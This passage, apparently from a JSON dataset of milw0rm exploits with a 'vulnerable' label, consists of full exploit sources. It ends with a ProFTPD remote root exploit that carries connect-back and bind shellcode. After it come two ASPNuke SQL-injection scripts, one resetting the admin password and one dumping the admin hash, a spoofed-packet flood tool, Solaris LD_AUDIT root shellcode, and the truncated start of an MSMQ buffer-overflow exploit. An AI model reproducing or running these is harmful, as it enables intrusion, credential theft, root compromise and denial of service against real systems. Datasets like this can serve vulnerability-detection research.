{\n\n        printf(\"gethostbyname(%s) error\\n\",server);\n\n        return(-1);\n\n    }      \n\n    \n\n    bzero(&cliaddr,sizeof(struct sockaddr));\n\n    cliaddr.sin_family=AF_INET;\n\n    cliaddr.sin_port=htons(port);\n\n    cliaddr.sin_addr=*((struct in_addr *)host->h_addr);\n\n    printf(\"[+] Trying %s:%d....\",server,port);\n\n    fflush(stdout);\n\n    if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)\n\n    {\n\n        printf(\"error:%s\\r\\n\",strerror(errno));\n\n        close(sockfd);\n\n        return(-1);\n\n    }\n\n    printf(\"ok\\r\\n\");\n\n    return(0);\n\n}\n\n\n\nvoid checkstatus(char *s)\n\n{\n\n    if(s==NULL)\n\n        quit();\n\n    if(isdigit(*s))\n\n    {\n\n        if(s[0]=='5')\n\n        {    \n\n            printf(\"[-] Server told:%s\\n\",s);\n\n            quit();\n\n        }\n\n        else\n\n            return;\n\n    }\n\n    printf(\"[-] Server said:%s\\n\",s);\n\n    quit();\n\n}\n\n\n\nvoid loginftp(char *user,char *pass)\n\n{\n\n    int j;\n\n    \n\n    show=1;\n\n    readbuf(\"Get banner\",sockfd,srvbuf,SIZE);\n\n    show=0;\n\n    memset(cmdbuf,0,SIZE);\n\n    //USER\n\n    j=sprintf(cmdbuf,\"%s %s\\r\\n\",usrstr,user);\n\n    sendbuf(sockfd,cmdbuf,j);\n\n    readbuf(NULL,sockfd,srvbuf,SIZE);\n\n    checkstatus(srvbuf);\n\n    //PASS\n\n    memset(cmdbuf,0,SIZE);\n\n    j=sprintf(cmdbuf,\"%s %s\\r\\n\",passtr,pass);\n\n    sendbuf(sockfd,cmdbuf,j);\n\n    readbuf(NULL,sockfd,srvbuf,SIZE);\n\n    checkstatus(srvbuf);\n\n    printf(\"[+] User %s logged in\\n\",user);\n\n}\n\n\n\nint setpasv()\n\n{\n\n    int j,port1;\n\n        \n\n    memset(cmdbuf,0,SIZE);\n\n    j=sprintf(cmdbuf,\"%s\\r\\n\",pasvstr);\n\n    sendbuf(sockfd,cmdbuf,j);\n\n    readbuf(\"Set PASV\",sockfd,srvbuf,SIZE);\n\n    checkstatus(srvbuf);\n\n    port1=dealpasv(srvbuf); //get the pasv port\n\n    return port1;\n\n}\n\n\n\nvoid setascii()\n\n{\n\n    int j;\n\n    \n\n    memset(cmdbuf,0,SIZE);\n\n    j=sprintf(cmdbuf,\"%s\\r\\n\",ascistr);\n\n    sendbuf(sockfd,cmdbuf,j);\n\n    readbuf(NULL,sockfd,srvbuf,SIZE);\n\n    checkstatus(srvbuf);    \n\n\n\n}\n\n\n\nvoid storbuf(char *filename,char *buf,int size,int port)\n\n{\n\n    int j;\n\n    \n\n    printf(\"[+] STOR file %s\\n\",filename);\n\n    memset(cmdbuf,0,SIZE);\n\n    j=sprintf(cmdbuf,\"%s %s\\r\\n\",storstr,filename);\n\n    sendbuf(sockfd,cmdbuf,j);\n\n    storfile(buf,size,port);\n\n    //check if the content is send overd\n\n    readbuf(NULL,sockfd,srvbuf,SIZE);\n\n    checkstatus(srvbuf);\n\n}\n\n\n\nvoid retrbuf(char *filename,char *buffer,int length,int port1)\n\n{\n\n    int j;\n\n    \n\n    printf(\"[+] RETR file %s\\n\",filename);\n\n    memset(cmdbuf,0,SIZE);\n\n    j=sprintf(cmdbuf,\"%s %s\\r\\n\",retrstr,filename);\n\n    sendbuf(sockfd,cmdbuf,j);\n\n    \n\n    retrfile(buffer,length,port1);\n\n    readbuf(NULL,sockfd,srvbuf,SIZE);\n\n    checkstatus(srvbuf);\n\n}\n\n\n\nint createbuffer(char *s,int len,int type,char *h)\n\n{\n\n    int i,a,total;\n\n    char buf[41];\n\n    unsigned int writeaddr=targets[type-1].ret;\n\n    \n\n    writeaddr-=4;\n\n    if(checklf((void *)&writeaddr,4)<0)\n\n    {\n\n        printf(\"[-] Sorry, the ret addr %p=%p-4 have '\\\\n' char.\\n\",writeaddr,writeaddr+4);\n\n        quit();\n\n    }\n\n    a=i=0;\n\n    memset(s,0,len);\n\n    i+=3;\n\n    *(unsigned int *)(s+i)=writeaddr+7*4;\n\n    i+=4;\n\n    *(unsigned int *)(s+i)=writeaddr-0x600;\n\n    i+=4;\n\n    *(unsigned int *)(s+i)=writeaddr-0x400;\n\n    i+=4;\n\n    *(unsigned int *)(s+i)=writeaddr-0x200;\n\n    i+=4;\n\n    *(unsigned int *)(s+i)=writeaddr-0x300;\n\n    i+=4;\n\n    *(unsigned int *)(s+i)=0x0;\n\n    i+=4;\n\n    *(unsigned int *)(s+i)=0x90900eeb;\n\n    i+=4;\n\n    *(unsigned int *)(s+i)=0x0;\n\n    i+=4;\n\n    *(unsigned int *)(s+i)=0x0;\n\n    i+=4;\n\n    *(unsigned int *)(s+i)=0x0;\n\n    i+=4;\n\n    //connectback shellcode,modified ip & port\n\n    if(bindmethod==0)\n\n    {\n\n        modify(cbshellcode,h,pt);\n\n        memcpy(s+i,cbshellcode,strlen(cbshellcode));\n\n        i+=strlen(cbshellcode);\n\n    }\n\n    else\n\n    {\n\n        modify(bindshellcode,NULL,pt);\n\n        memcpy(s+i,bindshellcode,strlen(bindshellcode));\n\n        i+=strlen(bindshellcode);\n\n    }\n\n    memset(s+i,'Z',512-i);\n\n    memset(s+512,'\\n',512);\n\n    total=1024;\n\n    memset(buf,0,41);\n\n    i=0;\n\n    memset(buf,'\\n',20);\n\n    i+=20;\n\n    *(unsigned int *)(buf+i)=writeaddr;\n\n    i+=4;\n\n    *(unsigned int *)(buf+i)=writeaddr;\n\n    i+=4;\n\n    *(unsigned int *)(buf+i)=writeaddr+0x800; //here,the value must great than 0x600\n\n    i+=4;\n\n    *(unsigned int *)(buf+i)=writeaddr;\n\n    i+=4;\n\n    *(unsigned int *)(buf+i)=writeaddr;\n\n    //showmem(buf,40);\n\n    for(i=0;i<1024;i++)\n\n    {\n\n        a=(i*40)+1024;\n\n        memcpy(s+a,buf,40);\n\n        total+=40;\n\n    }\n\n    return total;\n\n}\n\n\n\nint create_serv(int sfd,int port)\n\n{\n\n    struct sockaddr_in srvaddr;\n\n    int on=1;\n\n    \n\n    bzero(&srvaddr,sizeof(struct sockaddr));\n\n    srvaddr.sin_port=htons(port);\n\n    srvaddr.sin_family=AF_INET;\n\n    srvaddr.sin_addr.s_addr=htonl(INADDR_ANY);\n\n    printf(\"[+] Listening on %d ....\",port);\n\n      fflush(stdout);\n\n    setsockopt(sfd,SOL_SOCKET,SO_REUSEADDR,&on,sizeof(on));  //so I can rebind the port\n\n    if(bind(sfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<0)\n\n    {\n\n        printf(\"FAILED\\n\");\n\n        perror(\"[-] Bind port error\");\n\n        return(-1);\n\n    }\n\n    if(listen(sfd,5)<0)\n\n    {\n\n        printf(\"FAILED\\n\");\n\n        perror(\"[-] Listen error\");\n\n        return(-1);\n\n    }\n\n    printf(\"ok\\n\");\n\n    return(0);\n\n}\n\n\n\nvoid modify(char *s,char *h,int port3)\n\n{\n\n    int a,b,c,d;\n\n    if(h!=NULL)\n\n    {\n\n        sscanf(h,\"%d.%d.%d.%d\",&a,&b,&c,&d);    \n\n        a&=0xff;\n\n        b&=0xff;\n\n        c&=0xff;\n\n        d&=0xff;\n\n        if((char)a=='\\n' || (char)b=='\\n' || (char)c=='\\n' || (char)d=='\\n')\n\n        {\n\n            printf(\"[-] Sorry, the connect back ip:%s have '\\\\n' char\\n\",h);\n\n        }\n\n        s[OFFSET] = a & 0xff;\n\n        s[OFFSET+1] = b & 0xff;\n\n        s[OFFSET+2] = c & 0xff;\n\n        s[OFFSET+3] = d & 0xff;\n\n        \n\n        a=port3 >> 8 & 0xff;\n\n        b=port3 & 0xff;\n\n        if((char)a=='\\n' || (char)b=='\\n')\n\n        {\n\n            printf(\"[-] Sorry, the connect back port:%d have '\\\\n' char\\n\",port3);\n\n            quit();\n\n        }\n\n        s[OFFSET+6]=a;\n\n        s[OFFSET+7]=b;\n\n    }\n\n    else\n\n    {\n\n        a=port3 >> 8 & 0xff;\n\n        b=port3 & 0xff;\n\n        if((char)a=='\\n' || (char)b=='\\n')\n\n        {\n\n            printf(\"[-] Sorry, the bind port:%d have '\\\\n' char\\n\",port3);\n\n            quit();\n\n        }\n\n        s[OFF2]=a;\n\n        s[OFF2+1]=b;\n\n    }\n\n}\n\nvoid usage(char *s)\n\n{\n\n    unsigned int a;\n\n    char *p;\n\n    int d=strlen(s)+1;\n\n    \n\n    p=(char *)malloc(d);\n\n    memset(p,0x20,d-1);\n\n    p[d-1]=0;\n\n    printf(\"@---------------------------------------------------------@\\n\");\n\n    printf(\"# proftpd 1.2.7/1.2.9rc2 remote root exploit(01/10)-%s  #\\n\",VER);\n\n    printf(\"@    by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com      @\\n\");\n\n    printf(\"-----------------------------------------------------------\\n\");\n\n    printf(\"Usage:%s -d <host> -u <user> -p <pass> -t <type>\\n\",s);\n\n    printf(\"      %s -l <local ip> -h <cbip> -o <cbport>\\n\",p);\n\n    printf(\"Arguments:\\n\");\n\n    printf(\"      -d target host ip/name\\n\");\n\n    printf(\"      -u user name\\n\");\n\n    printf(\"      -p user paasword\\n\");\n\n    printf(\"      -l the ip of this machine u used\\n\");\n\n    printf(\"      -h connect back ip\\n\");\n\n    printf(\"      -o connect back port/bind port\\n\");\n\n    printf(\"      -t target type [default:%d]\\n\",type);\n\n    printf(\"      ------------------------------\\n\");\n\n    for(a = 0; a < sizeof(targets)/sizeof(v); a++)\n\n        printf(\"         %d [0x%.8x]: %s\\n\", a+1, targets[a].ret, targets[a].os);   \n\n    printf(\"\\n\"); \n\n    free(p);          \n\n    exit(0);\n\n}\n\n\n\nint execsh(int clifd)\n\n{ \n\n    fd_set fds;\n\n    int count;\n\n    char buffer[SIZE];\n\n    memset(buffer,0,SIZE);\n\n    while(1)\n\n    {\n\n        FD_ZERO(&fds);\n\n        FD_SET(0, &fds);\n\n        FD_SET(clifd, &fds);\n\n        \n\n        if (select(clifd+1, &fds, NULL, NULL, NULL) < 0) \n\n        {\n\n            if (errno == EINTR) continue;\n\n            break;\n\n        }\n\n        if (FD_ISSET(0, &fds)) \n\n        {\n\n            count = read(0, buffer, SIZE);\n\n            if (count <= 0) break;\n\n            if (write(clifd, buffer, count) <= 0) break;\n\n            memset(buffer,0,SIZE);\n\n        }\n\n        if (FD_ISSET(clifd, &fds)) \n\n        {\n\n            count = read(clifd, buffer, SIZE);\n\n            if (count <= 0) break;\n\n            if (write(1, buffer, count) <= 0) break;\n\n            memset(buffer,0,SIZE);\n\n        }\n\n        \n\n    }\n\n}\n\n    \n\nint checklf(void *sd,int len)\n\n{\n\n    char *a;\n\n    int i=0;\n\n    \n\n    a=(char *)sd;\n\n    for(i=0;i<len;i++)\n\n        if(*(a+i)=='\\n') //found it\n\n            return -1;\n\n    return 0;\n\n}\n\n\n\n\n\n\n\n// milw0rm.com [2003-10-04]",
385        "vulnerable": true
386    },
387    {
388        "exploit_id": 1070,
389        "content": "#!/usr/bin/perl\n\n######################################################################################\n\n#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m\n\n######################################################################################\n\n# EXPLOIT FOR: ASPNuke ASP Portal\n\n#\n\n# Expl0it By: mh_p0rtal@Yahoo.com\n\n#\n\n# Discovered By: Trap-Set Underground Hacking Team (oil_KarchacK)\n\n#\n\n######################################################################################\n\n#  GR33tz T0 ==>    Alpha_programmer  --  oil_Karchack  --  the_CephaleX  -- Str0ke\n\n#  And Iranian Security & Technical Sites:\n\n#  IHS TeaM , alphaST , Shabgard Security Team  , Emperor Hacking Team  ,\n\n#  Crouz Security Team , Hat-squad security team  & Simorgh-ev Security Team\n\n######################################################################################\n\nuse IO::Socket;\n\n\n\nif (@ARGV < 1)\n\n{\n\n print \"\\n==========================================\\n\";\n\n print \" \\n     -- Exploit By mh_p0rtal --\\n\\n\";\n\n print \"     Trap-Set Underground Hacking Team      \\n\\n\";\n\n print \"         Usage:ASPNuke.pl <T4rg3t> \\n\\n\";\n\n print \"==========================================\\n\\n\";\n\n print \"Examples:\\n\\n\";\n\n print \"   ASPNuke.pl www.Site.com \\n\";\n\n exit();\n\n}\n\n\n\nmy $host = $ARGV[0];\n\nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host,\n\nPeerPort => \"80\" );\n\n\n\nunless ($remote) { die \"C4nn0t C0nn3ct to $host\" }\n\n\n\nprint \"[+]C0nn3cted\\n\";\n\n\n\n$addr = \"GET /module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c'%20,%20username='trapset'%20where%20userID=1%20-- HTTP/1.0\\n\";\n\n$addr .= \"Host: $host\\n\\n\\n\\n\";\n\nprint \"\\n\";\n\nprint $remote $addr;\n\nprint \"[+]Wait...\";\n\nsleep(5);\n\nprint \"Wait For Changing Password ...\\n\";\n\n\n\nprint \"[+]OK , Now Login With : \\n\";\n\nprint \"Username: trapset\\n\";\n\nprint \"Password: trapset\\n\\n\";\n\n\n\n\n\n# milw0rm.com [2005-06-27]",
390        "vulnerable": true
391    },
392    {
393        "exploit_id": 1071,
394        "content": "#!/usr/bin/perl -w\n\n#\n\n# SQL Injection Exploit for ASPNuke <= 0.80\n\n# This exploit retrieve the username of the administrator of the board and his password crypted in SHA256\n\n# Related advisory: http://www.securityfocus.com/archive/1/403479/30/0/threaded\n\n# Discovered and Coded by Alberto Trivero\n\n\n\nuse LWP::Simple;\n\n\n\nprint \"\\n\\t===============================\\n\";\n\nprint \"\\t= Exploit for ASPNuke <= 0.80 =\\n\";\n\nprint \"\\t=     by Alberto Trivero      =\\n\";\n\nprint \"\\t===============================\\n\\n\";\n\n\n\nif(@ARGV!=1 or !($ARGV[0]=~m/http/)) {\n\n   print \"Usage:\\nperl $0 [full_target_path]\\n\\nExamples:\\nperl $0 http://www.example.com/aspnuke/\\n\";\n\n   exit(0);\n\n}\n\n\n\n$page=get($ARGV[0].\"module/support/task/comment_post.asp?TaskID=Username\") || die \"[-] Unable to retrieve: $!\";\n\nprint \"[+] Connected to: $ARGV[0]\\n\";\n\n$page=~m/the varchar value '(.*?)' to a column/ && print \"[+] Username of admin is: $1\\n\";\n\nprint \"[-] Unable to retrieve Username\\n\" if(!$1);\n\n$page=get($ARGV[0].\"module/support/task/comment_post.asp?TaskID=Password\") || die \"[-] Unable to retrieve: $!\";\n\n$page=~m/the varchar value '(.*?)' to a column/ && print \"[+] SHA256 hash of password is: $1\\n\";\n\nprint \"[-] Unable to retrieve hash of password\\n\" if(!$1);\n\n\n\n# milw0rm.com [2005-06-27]",
395        "vulnerable": true
396    },
397    {
398        "exploit_id": 1072,
399        "content": "/**\n\n\n\nStraped 1.0 author: Marco Del Percio 20/05/2005\n\n\n\nRemember: this is a mulithreaded program! MSVC++ compile with /MT.\n\nRemember: This program requires raw socket support! You can't use it on Windows XP SP2 and\n\nif you've done MS05-019 update you'll have to re-enable raw socket support! (If you still can)\n\nsee http://seclists.org/lists/nmap-hackers/2005/Apr-Jun/0001.htm for info about this.\n\n\n\nlevante at manicomio.org\n\n\n\n*/\n\n#define WIN32_LEAN_AND_MEAN\n\n#include <winsock2.h>\n\n#include <stdio.h>\n\n#include <ws2tcpip.h>\n\n#include <string.h>\n\n#include <process.h>\n\n\n\n#pragma comment(lib, \"ws2_32\")\n\n\n\n/* Global variables */\n\nWSADATA wsa;\n\nint delay = 1;\n\nBOOL flag = TRUE;\n\nHANDLE TIARRAY[256];\n\nunsigned int target;\n\nunsigned char attackType;\n\n\n\n/* IP header structure */\n\nstruct ip_hdr {\n\n   unsigned char ip_hl:4, ip_v:4;\n\n   unsigned char ip_tos;\n\n   unsigned short ip_len;\n\n   unsigned short ip_id;\n\n   unsigned short ip_off;\n\n   unsigned char ip_ttl;\n\n   unsigned char ip_p;\n\n   unsigned short ip_sum;\n\n   unsigned int ip_src;\n\n   unsigned int ip_dst;\n\n};\n\n\n\n/* TCP header structure */\n\nstruct tcp_hdr {\n\n   unsigned short th_sport;\n\n   unsigned short th_dport;\n\n   unsigned int th_seq;\n\n   unsigned int th_ack;\n\n   unsigned char th_x2:4, th_off:4;\n\n   unsigned char th_flags;\n\n   unsigned short th_win;\n\n   unsigned short th_sum;\n\n   unsigned short th_urp;\n\n};\n\n\n\n#define TOTAL_LEN (sizeof(struct ip_hdr) + sizeof(struct tcp_hdr))\n\n\n\nvoid flood(void *id); /* Thread flood function */\n\n\n\n/* A common checksum function */\n\nunsigned short checksum(unsigned short *buffer, int size) {\n\n   unsigned long cksum=0;\n\n   while(size > 1) {\n\n      cksum += *buffer++;\n\n      size -= sizeof(unsigned short);\n\n   }\n\n   if(size)\n\n      cksum += *(unsigned char*)buffer;\n\n   cksum = (cksum >> 16) + (cksum & 0xffff);\n\n   cksum += (cksum >> 16);\n\n   return (unsigned short)(~cksum);\n\n}\n\n\n\n\n\nint main(int argc, char *argv[]) {\n\n   int i = 0, nthreads = 1;\n\n    \n\n   if( argc != 5) {\n\n      printf(\"\\nStraped 1.0 Mix of stream/raped attack ported to Windows by LeVante^\\n\\nUse:\\n%s <target IP> <delay(ms)> <tcp flags: ack|null> <number of threads>\\n\",argv[0]);\n\n      exit(1);\n\n   }\n\n    \n\n   if(WSAStartup(MAKEWORD(2,1),&wsa)) {\n\n                fprintf(stderr, \"\\nError! WSAStartup failed!\\n\");\n\n                exit(1);\n\n   }\n\n   /* Target Ip and type of attack (tcp flags) are shared between threads since they're global */\n\n   target = inet_addr(argv[1]);\n\n   delay = atoi(argv[2]);\n\n   if(!strcmp(argv[3],\"ack\"))\n\n                attackType = 0x00000010;\n\n   else if(!strcmp(argv[3],\"null\"))\n\n                attackType = 0x00000000;\n\n   else {\n\n                fprintf(stderr, \"\\nError! Tcp flags MUST be \\\"ack\\\" or \\\"null\\\".\\n\");\n\n                WSACleanup();\n\n                exit(1);\n\n   }\n\n   nthreads = atoi(argv[4]);\n\n   /* No more than 256 threads allowed */\n\n   if(nthreads <=0 || nthreads > 255) {\n\n                fprintf(stderr, \"\\nError! Number of threads must be between 1 and 256\\n\");\n\n                WSACleanup();\n\n                exit(1);\n\n   }\n\n   for(i=0;i<nthreads;i++) {\n\n           TIARRAY[i] = CreateMutex(NULL, FALSE, NULL);\n\n           /* The ID of each thread is the only argument passed to the thread function (as a void *) */\n\n           _beginthread( flood, 0, (void *) i);\n\n   }\n\n   Sleep(100);\n\n   printf(\"\\nPacket flooding %s with %d threads...\\n\", argv[1], nthreads);\n\n        //just wait\n\n   WaitForMultipleObjects(nthreads, TIARRAY, TRUE, INFINITE);\n\n   return 0;\n\n}\n\n\n\nvoid flood(void *id) {\n\n        SOCKET sock;\n\n        int delay = 1;\n\n        unsigned char packet[4096];\n\n        struct sockaddr_in sin;\n\n        unsigned short pseudo[32], seg_length = 20;\n\n        unsigned char one,two,three,four, *ptr;\n\n        unsigned char spoofed_address[7];\n\n        struct ip_hdr *ip = (struct ip_hdr *) packet;\n\n        struct tcp_hdr *tcp = (struct tcp_hdr *) (packet + 20);\n\n\n\n        WaitForSingleObject(TIARRAY[(int)id], INFINITE);\n\n        if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {\n\n                fprintf(stderr, \"\\nThread with ID %d was unable to open socket\\n\", (int)id);\n\n                _endthread();\n\n        }\n\n        sin.sin_family = AF_INET;\n\n        sin.sin_port = htons(135); //this will be changed with a random port\n\n        sin.sin_addr.s_addr = target;\n\n        memset(packet, 0, 4096);\n\n    \n\n        ip->ip_hl = 5;\n\n        ip->ip_v = 4;\n\n        ip->ip_tos = 0;\n\n        ip->ip_len = htons(TOTAL_LEN);\n\n        ip->ip_id = htons((USHORT)rand());\n\n        ip->ip_off = 0;\n\n        ip->ip_ttl = 128;\n\n        ip->ip_p = 6;\n\n        ip->ip_sum = 0;\n\n        ip->ip_src = target;\n\n        ip->ip_dst = sin.sin_addr.s_addr;\n\n    \n\n        tcp->th_sport = htons((USHORT)rand()); /* Random source/destination port */\n\n        tcp->th_dport = htons((USHORT)rand());\n\n        tcp->th_seq = htonl(rand());\n\n        tcp->th_ack = htonl(0);\n\n        tcp->th_x2 = 0;\n\n        tcp->th_off = 5;\n\n        tcp->th_flags = attackType; /* either ack or no flags set */\n\n        tcp->th_win = htons(16384);\n\n        tcp->th_sum = 0;\n\n        tcp->th_urp = 0;\n\n\n\n        ip->ip_sum = checksum((unsigned short *) packet, 20);\n\n        ptr = (unsigned char *)pseudo;\n\n    \n\n   /* These passages were NOT coded by me. They're from Sahir Hidayatullah. These statements are based on hard coded offsets of the various fields from the start of the datagram */\n\n    \n\n        memset(pseudo,0,32); // Zero out the pseudo-header\n\n        memcpy(ptr,packet+20,20); // Copy in the tcp header\n\n        memcpy((ptr+20),packet+12,4); // Source IP\n\n        memcpy((ptr+24),packet+16,4); // Dest IP\n\n        memcpy((ptr+29),packet+9,1); // 8bit zero + Protocol\n\n        memset((ptr+31),20,1);\n\n        tcp->th_sum = checksum(pseudo, 32);\n\n     \n\n        if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) < 0) {\n\n        fprintf(stderr, \"\\nError! Thread with ID %d was unable to set IP_HDRINCL option\\n\", (int)id);\n\n                closesocket(sock);\n\n                _endthread();\n\n        }\n\n        while(1){\n\n                /* Each cycle generate a random source IP address, a random source/destination port, a random sequence number and a random IP id\n\n                then recalculate checksum both for IP and TCP and finally sends out the packet */\n\n                ptr = NULL;\n\n                sin.sin_port = htons((USHORT)rand());\n\n                one = rand() % 256;\n\n                two = rand() % 256;\n\n                three = rand() % 256;\n\n                four = rand() % 256;\n\n                sprintf(spoofed_address,\"%d.%d.%d.%d\\0\",one,two,three,four);\n\n                ip->ip_src = inet_addr(spoofed_address);\n\n                ip->ip_id = htons((USHORT)rand());\n\n                ip->ip_sum = 0;\n\n                ip->ip_sum = checksum((unsigned short *) packet, 20);\n\n                tcp->th_sport = htons((USHORT)rand());\n\n                tcp->th_dport = htons((USHORT)rand());\n\n                tcp->th_seq = htonl(rand());\n\n                tcp->th_sum=0;\n\n                /* Same passages for re-calculating pseudo-header. */\n\n                ptr = (unsigned char *)pseudo;\n\n                memset(pseudo,0,32);\n\n                memcpy(ptr,packet+20,20);\n\n                memcpy((ptr+20),packet+12,4);\n\n                memcpy((ptr+24),packet+16,4);\n\n                memcpy((ptr+29),packet+9,1);\n\n                memset((ptr+31),20,1);\n\n                tcp->th_sum = checksum(pseudo, 32);\n\n         \n\n                /* Sends out the datagram. 40 bytes is the sum of IP and TCP header length */\n\n                if(sendto(sock,packet,40,0,(struct sockaddr *) &sin, sizeof(sin)) < 0)\n\n                        printf (\"Thread with ID %d. Error while sending the packet: %d\\n\", (int)id, WSAGetLastError());\n\n                if(delay)\n\n                        Sleep(delay);\n\n   }\n\n\n\n}\n\n\n\n// milw0rm.com [2005-06-27]",
400        "vulnerable": true
401    },
402    {
403        "exploit_id": 1073,
404        "content": "/*\n\n- SunOS 5.10 Generic i86pc i386 i86pc\n\n- SunOS 5.9 Generic_112233-12 sun4u\n\n\n\nIt does NOT work on:\n\n\n\nSunOS 5.8 Generic_117350-02 sun4u sparc\n\n\n\nExample on unpatched Solaris 10 (AMD64):\n\n\n\natari:venglin:~> cat dupa.c\n\n*/\n\n\n\nstatic char sh[] =\n\n\"\\x31\\xc0\\xeb\\x09\\x5a\\x89\\x42\\x01\\x88\\x42\\x06\\xeb\\x0d\\xe8\\xf2\\xff\\xff\\xff\\x9a\\x01\\x01\\x01\\x01\\x07\\x01\\xc3\\x50\\xb0\\x17\\xe8\\xf0\\xff\\xff\\xff\\x31\\xc0\\x68\\x2f\\x73\\x68\\x5f\\x68\\x2f\\x62\\x69\\x6e\\x88\\x44\\x24\\x07\\x89\\xe3\\x50\\x53\\x8d\\x0c\\x24\\x8d\\x54\\x24\\x04\\x52\\x51\\x53\\xb0\\x0b\\xe8\\xcb\\xff\\xff\\xff\";\n\n\n\nint la_version() {\n\n       void (*f)();\n\n       f = (void*)sh;\n\n       f();\n\n       return 3;\n\n}\n\n\n\n/*\n\natari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c\n\natari:venglin:~> setenv LD_AUDIT /tmp/dupa.so\n\natari:venglin:~> su\n\n\n\n# id\n\nuid=0(root) gid=10(staff)\n\n*/\n\n\n\n// milw0rm.com [2005-06-28]",
405        "vulnerable": true
406    },
407    {
408        "exploit_id": 1074,
409        "content": "/* \n\nSolaris 9 on SPARC: \n\n\n\n$ cat dupa.c\n\n*/\n\n\n\nchar sh[] =\n\n/* setuid() */\n\n\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\"\n\n/* execve() */\n\n\"\\x20\\xbf\\xff\\xff\\x20\\xbf\\xff\\xff\\x7f\\xff\\xff\\xff\\x90\\x03\\xe0\\x20\"\n\n\"\\x92\\x02\\x20\\x10\\xc0\\x22\\x20\\x08\\xd0\\x22\\x20\\x10\\xc0\\x22\\x20\\x14\"\n\n\"\\x82\\x10\\x20\\x0b\\x91\\xd0\\x20\\x08/bin/ksh\";\n\n\n\nint la_version() {\n\n       void (*f)();\n\n       f = (void*)sh;\n\n       f();\n\n       return 3;\n\n}\n\n\n\n/*\n\n$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c\n\n$ export LD_AUDIT=/tmp/dupa.so\n\n$ ping\n\n# id\n\nuid=0(root) gid=100(student)\n\n*/\n\n\n\n// milw0rm.com [2005-06-28]",
410        "vulnerable": true
411    },
412    {
413        "exploit_id": 1075,
414        "content": "/* HOD-ms05017-msmq-expl.c: 2005-06-28: PUBLIC v.0.3\n\n *\n\n * Copyright (c) 2004-2005 houseofdabus.\n\n *\n\n * (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n * Universal Exploit\n\n *\n\n *\n\n *\n\n *                 .::[ houseofdabus ]::.\n\n *\n\n *\n\n *\n\n * [ http://www.livejournal.com/users/houseofdabus\n\n * ---------------------------------------------------------------------\n\n * Systems Affected:\n\n *    - Windows XP SP1\n\n *    - Windows 2000 SP4\n\n *    - Windows 2000 SP3\n\n *\n\n * ---------------------------------------------------------------------\n\n * Description:\n\n *    A remote code execution vulnerability exists in Message Queuing\n\n *    that could allow an attacker who successfully exploited this\n\n *    vulnerability to take complete control of the affected system.\n\n *\n\n * ---------------------------------------------------------------------\n\n * Solution:\n\n *    http://www.microsoft.com/technet/security/Bulletin/MS05-017.mspx\n\n *\n\n * ---------------------------------------------------------------------\n\n * Tested on:\n\n *    - Windows XP SP1\n\n *    - Windows XP SP0\n\n *    - Windows 2000 PRO SP4\n\n *    - Windows 2000 PRO SP3\n\n *    - Windows 2000 Server SP4\n\n *    - Windows 2000 AdvServer SP4\n\n *\n\n * ---------------------------------------------------------------------\n\n * Compile:\n\n *\n\n * Win32/VC++  : cl -o HOD-ms05017-msmq-expl HOD-ms05017-msmq-expl.c\n\n * Win32/cygwin: gcc -o HOD-ms05017-msmq-expl HOD-ms05017-msmq-expl.c\n\n * Linux       : gcc -o HOD-ms05017-msmq-expl HOD-ms05017-msmq-expl.c\n\n *\n\n * ---------------------------------------------------------------------\n\n * Example:\n\n *\n\n * C:\\>HOD-ms05017-msmq-expl 192.168.0.1 2103 HOD 7777\n\n *\n\n * [*] Connecting to 192.168.0.22:2103 ... OK\n\n * [*] Attacking...OK\n\n *\n\n * C:\\>telnet 192.168.0.1 7777\n\n *\n\n * Microsoft Windows 2000 [Version 5.00.2195]\n\n * (C) Copyright 1985-2000 Microsoft Corp.\n\n *\n\n * C:\\WINNT\\system32>net stop msmq\n\n *\n\n * The Message Queuing service was stopped successfully.\n\n *\n\n * C:\\WINNT\\system32>net start msmq\n\n * The Message Queuing service is starting..\n\n * The Message Queuing service was started successfully.\n\n *\n\n * C:\\WINNT\\system32>\n\n *\n\n * For some system (Windows 2000 Server/AdvServer):\n\n *\n\n * C:\\>HOD-ms05017-msmq-expl.exe 192.168.0.1 2103 HOD 9999 8\n\n *\n\n * [*] Connecting to 192.168.0.210:2103 ... OK\n\n * [*] Attacking...........OK\n\n *\n\n * C:\\>telnet 192.168.0.1 9999\n\n *\n\n * Microsoft Windows 2000 [Version 5.00.2195]\n\n * (C) Copyright 1985-2000 Microsoft Corp.\n\n *\n\n *\n\n * ---------------------------------------------------------------------\n\n *\n\n * This is provided as proof-of-concept code only for educational\n\n * purposes and testing by authorized individuals with permission\n\n * to do so.\n\n *\n\n */\n\n\n\n/* #define _WIN32 */\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n\n\n#ifdef _WIN32\n\n#include <winsock2.h>\n\n#pragma comment(lib, \"ws2_32\")\n\n#pragma pack(1)\n\n#else\n\n#include <sys/types.h>\n\n#include <netinet/in.h>\n\n#include <sys/socket.h>\n\n#endif\n\n\n\n\n\n#define NOP\t\t\t0x90\n\n#define _DCE_RPC_BIND\t\t0x0B\n\n\n\n\n\ntypedef struct dce_rpc {\n\n\tunsigned char\tver;\n\n\tunsigned char\tver_minor;\n\n\tunsigned char\tpkt_type;\n\n\tunsigned char\tpkt_flags;\n\n\tunsigned long\tdata_repres;\n\n\tunsigned short\tfrag_len;\n\n\tunsigned short\tauth_len;\n\n\tunsigned long\tcaller_id;\n\n} DCE_RPC, *PDCE_RPC;\n\n\n\n\n\ntypedef struct dce_rpc_bind {\n\n\tunsigned short\tmax_xmit;\n\n\tunsigned short\tmax_recv;\n\n\tunsigned long\tasc_group;\n\n\tunsigned long\tnum_con_items;\n\n\tunsigned short\tcon_id;\n\n\tunsigned 